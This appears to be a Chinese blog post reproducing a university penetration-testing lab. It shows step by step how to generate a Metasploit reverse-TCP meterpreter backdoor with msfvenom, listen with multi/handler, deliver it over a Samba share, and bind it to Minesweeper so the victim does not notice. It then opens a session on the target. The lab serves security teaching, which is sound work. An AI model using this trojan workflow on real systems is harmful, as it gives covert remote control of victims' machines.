Kali渗透Windows服务器

Kali渗透Windows服务器

一个yijing的实验

实验简介

实验所属系列:网络渗透测试

实验对象:本科/专科信息安全专业

相关课程及专业:计算机基础,Linux基础

实验时数(学分):2学时

实验类别:实践实验类

预备知识

Kali是一款开源的安全漏洞检测工具,是专用用于渗透测试的Linux操作系统,由BackTrack发展而来,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的漏洞分析情况。

实验目的

学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。

实验环境

靶机:Windows 7 IP随机

攻击机:Kali IP:10.1.1.102

实验步骤一

本实验通过利用kali生成后门程序,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验任务,详情如下:

1.1生成setup.exe后门程序,即木马程序

1、打开kali终端,输入

ifconfig

得到本机ip为10.1.1.102。

fig:

输入

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.102 -f exe > setup.exe

fig:

进入setup.exe所在目录,修改属性:选择“允许此文件作为程序运行”。如下图所示:

fig:

终端中首先输入

msfconsole

启动msf;

然后输入

use exploit/multi/handler

加载监听模块;

输入

set LHOST 10.1.1.102

来设置本地主机;

然后输入

exploit -z -j

开始监听,如下图所示:

fig:

建立本地共享目录

mkdir /a/share -p

进入根目录

cd /

将setup.exe移入共享文件夹

mv setup.exe /a/share

fig:

然后再修改权限

chmod 777 -R /a/share

然后在进入配置文件

/etc/samba/smb.conf

fig:

在尾部加入

[share]

path = /a/share

available = yes

browseable = yes

public = no

writable = yes

fig:

接着再终端建立用户

useradd a

smbpasswd -a a

fig:

启动

/etc/init.d/smbd restart

fig:

实验步骤二

可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件,这样在运行软件时两个软件同时运行,不会引起注意。在C盘tools文件夹里找到与实验名同名的文件,先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件,默认选择本软件中自带的小游戏程序:

fig:

fig:

将setup.exe和扫雷.exe绑定

fig:

fig:

将绑定后的文件放置桌面,点击运行

fig:

实验步骤三

目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。输入

sessions

可以看到目标主机的ip为10.1.1.100。

fig:

再继续输入

sessions -i 1

之后可以对目标主机进行一系列的操作。

如输入

sysinfo

可知道目标主机的系统信息;

fig:

输入

getuid

查看对方正在运行的用户。

fig:

posted @ 2025-04-29 08:15  ink599  阅读(169)  评论(0)    收藏  举报